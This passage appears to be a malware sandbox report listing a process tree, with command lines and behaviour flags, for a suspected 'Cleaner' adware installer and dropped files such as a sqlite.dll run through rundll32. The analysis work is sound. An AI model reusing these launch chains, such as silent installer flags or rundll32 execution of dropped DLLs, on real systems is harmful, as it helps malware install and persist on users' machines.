C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:36⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3904 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5704 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:16⤵
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6992 /prefetch:8
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7624 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
-
depth 6: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
-
depth 4: C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
  cmdline: "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
-
depth 4: C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\vdi_compiler.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\vdi_compiler"
  - Suspicious use of SetWindowsHookEx
-
depth 5: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 272
  - Program crash
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3896 -ip 3896
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1524 -ip 1524
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4612 -ip 4612
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2384 -ip 2384
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\system32\msiexec.exe
  cmdline: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
-
depth 2: C:\Windows\syswow64\MsiExec.exe
  cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6479BD780B29DCA4597EB58CE95F395A C
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Loads dropped DLL
-
depth 2: C:\Windows\syswow64\MsiExec.exe
  cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 72F44C44C65D6810B954FECE7328CD6C C
  - Loads dropped DLL
-
depth 2: C:\Windows\syswow64\MsiExec.exe
  cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E1D742ED256A302B4A72527592FE6A73
  - Blocklisted process makes network request
  - Loads dropped DLL
-
depth 2: C:\Windows\syswow64\MsiExec.exe
  cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 821DE82F00037D7ABAC1EFDC99C70E75 C
  - Loads dropped DLL
-
depth 2: C:\Windows\syswow64\MsiExec.exe
  cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5641C05DBA904095E4B2DB952999D429 C
-
depth 2: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
-
depth 3: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
-
depth 4: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffb5c20dec0,0x7ffb5c20ded0,0x7ffb5c20dee0
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1836 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1996 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2624 /prefetch:1
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2984 /prefetch:2
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3212 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3120 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=3140 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1424 /prefetch:8
-
depth 5: C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
  cmdline: "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,5897138930702875863,16863112268778844132,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4076_591161915" --mojo-platform-channel-handle=1028 /prefetch:8
-
depth 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3323.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6248 -ip 6248
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4640 -ip 4640
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of SetWindowsHookEx
-
depth 1: C:\Windows\system32\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
-
depth 2: C:\Windows\SysWOW64\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
-
depth 3: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 456
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3116 -ip 3116
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6392 -ip 6392
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6236 -ip 6236
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\system32\WerFault.exe
  cmdline: C:\Windows\system32\WerFault.exe -pss -s 660 -p 3712 -ip 3712
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of SetThreadContext
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6492 -ip 6492
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\system32\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
-
depth 2: C:\Windows\SysWOW64\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
-
depth 3: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 424
  - Program crash
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1212 -ip 1212
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\system32\WerFault.exe
  cmdline: C:\Windows\system32\WerFault.exe -pss -s 684 -p 5880 -ip 5880
  - Suspicious use of NtCreateProcessExOtherParentProcess
-
depth 1: C:\Windows\SysWOW64\WerFault.exe
